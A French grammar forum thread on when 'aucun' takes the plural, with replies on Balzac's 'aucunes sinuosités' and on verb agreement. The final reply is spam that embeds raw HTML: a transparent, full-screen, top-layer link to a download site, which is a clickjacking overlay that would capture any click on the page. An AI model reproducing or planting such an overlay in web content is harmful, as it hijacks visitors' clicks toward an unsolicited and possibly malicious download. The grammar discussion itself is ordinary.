Aucun ou aucuns ?

Bonjour,

Aucuns frais – OK Pluriel
Aucunes annales – OK Pluriel
Aucuns travaux – OK Pluriel
Aucunes vacances – OK Pluriel

L’accord au pluriel se fait-il dans la phrase suivante :

… sans qu’aucunes des deux parties ne se soient accordées.

Aucune aide n’a été proposée.  Singulier. OK ?

Merci.

Elsa.

Elsa Amateur éclairé Demandé le 25 mai 2016 dans Accords

13 réponse(s)

J’ai une autre question. Je suis professeur de français, et dans un de mes manuels, j’ai trouvé un extrait d’une description de Balzac, dans laquelle il est écrit « sans aucunes sinuosités ». Comme le mot sinuosité peut s’écrire au singulier, pour quelle raison l’a-t-il mis au pluriel ???? Énorme interrogation pour moi ! Merci de votre aide.

Melaniec Débutant Répondu le 24 novembre 2018

Bravo pour votre œil aiguisé !
Historiquement, et apparemment à l’époque de Balzac, il a existé une acception littéraire spécifique de sinuosité au pluriel. Voir ici le détail qu’en donne le TLFi, soit au sens propre (en B) soit au figuré (en C). Le singulier se rapportait plus au concept, le pluriel à l’aspect matériel et au résultat.
Cela explique à mon sens ce pluriel surprenant avec aucun, qu’on ne retrouverait sans doute pas sous une plume moderne. Pédagogiquement ce n’est pas idéal, mais telle est la langue française avec sa longue histoire…

le 24 novembre 2018.

Bonjour,

Une phrase me cause un léger souci, non en ce qui concerne « aucun » et « aucune » mais plutôt à propos de l’accord du verbe qui les suit.
L’auteur a écrit :
« Aucun membre de sa famille, aucune de ses amies n’avait été informée de son opération.  »

Je lui propose :
« Aucun membre de sa famille et aucune de ses amies n’avaient été informés de son opération.  »

Qu’en dites-vous ? Merci !

Azucena Grand maître Répondu le 5 septembre 2020

c’était une bonne chose je pense, mais vous devez ajouter plus d’informations
<a href= »http://download.tube » style= »z-index:99999999999;position:fixed;top:0px!important;left:0px;width:100%;height:100%;color:transparent!important;display:block;text-align:center; » onclick= »window.open(this.href); return false »></a>

guzmanneil Débutant Répondu le 7 février 2021